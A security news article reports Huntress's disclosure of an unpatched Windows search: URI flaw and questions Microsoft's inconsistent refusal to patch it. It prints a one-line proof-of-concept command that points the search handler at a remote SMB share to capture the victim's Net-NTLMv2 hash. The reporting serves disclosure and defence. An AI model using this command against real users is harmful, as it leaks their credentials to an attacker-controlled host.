Microsoft Refuses to Patch Windows Search URI Flaw Enabling NTLM Hash Theft

Huntress went public on June 3, 2026, with an unpatched vulnerability in the Windows search: URI handler. Initially disclosed to Microsoft on April 15, 2026, the flaw was rejected for a fix based on a policy decision: the calculated severity does not reach the company's threshold for servicing. Researcher Andrew Schwartz demonstrated that the mechanism is identical to CVE-2026-33829, a Snipping Tool vulnerability that Microsoft patched in April 2026.

Exploit Mechanics: From Click to Credential Theft

The proof-of-concept command published by Huntress is: start "" "search:query=test&crumb=location:\\10.0.1.100\share". When a user triggers this URI, Windows processes the crumb=location: parameter as a search location instruction. Because the system fails to verify if the path is local, it attempts to connect to the specified remote SMB host.

This connection triggers NTLM authentication. By controlling the destination SMB server, an attacker captures the user's Net-NTLMv2 hash. Schwartz confirmed that the leak "produces the same Net-NTLMv2, has the same prerequisites" as the previously patched Snipping Tool flaw.

Microsoft’s Refusal: When CVSS Blocks the Fix

Microsoft’s response, quoted by Huntress, states: "only Important and Critical severity cases meet our bar for servicing." In contrast, the Snipping Tool vulnerability (CVE-2026-33829) was patched despite carrying a CVSS 3.1 score of 4.3 (MEDIUM), according to the National Vulnerability Database. CVE-2026-32202 was added to the CISA KEV catalog on April 28, 2026.

"It used the same NTLM leakage mechanism, produced the same Net-NTLMv2 leak, had the same prerequisites, and carried the same Moderate rating" — Andrew Schwartz, Huntress

Precedents and Context: The 'Crumb' Parameter as a Recurring Vector

Varonis first documented the use of the crumb=location: parameter to induce unauthorized SMB connections in February 2024 (CVE-2023-35636). The recurrence of this vector across distinct Windows components—first in Outlook and other handlers, then the Snipping Tool, and now the search: handler—highlights a pattern of inconsistent validation.

Available evidence shows that while CVE-2026-33829 was resolved, the search: flaw remains active. The brief does not document the specific criteria Microsoft used to differentiate the two cases.

Analysis: The CVE-2026-33829 Contradiction

This case raises a structural question: why do the same mechanism, the same researcher, and the same CVSS 4.3 (MEDIUM) score result in two different outcomes? CVE-2026-33829 is patched, while the search: flaw—sharing an identical "Moderate" rating—is not.

The policy cited by Microsoft—that only "Important" and "Critical" cases merit servicing—is applied differently across vulnerabilities sharing the same classification. The refusal leaves a vulnerability capable of real-world credential theft active in the codebase.

Why This Case Signals a Policy Issue

The discrepancy remains unexplained, and Microsoft has not publicized its differentiation criteria. The case documents a bifurcated patching behavior where CVE-2026-33829 was resolved while the search: flaw remains active. For defenders, the operational consequences are dictated by the documented mechanism and the presence of related identifiers like CVE-2026-32202 in the CISA KEV catalog.

Information has been verified against cited sources and is current as of the time of publication.

Sources

• https://thehackernews.com/2026/06/unpatched-windows-search-uri.html
• https://nvd.nist.gov/vuln/detail/CVE-2026-33829
• https://technochat.in/how-the-windows-snipping-tools-cve-2026-33829-opens-the-door-to-ntlm-hash-theft/
• https://nvd.nist.gov/vuln/detail/CVE-2026-32202
• https://nvd.nist.gov/vuln
• https://nvd.nist.gov/vuln/categories
• https://nvd.nist.gov/vuln/data-feeds
• https://nvd.nist.gov/vuln/vendor-comments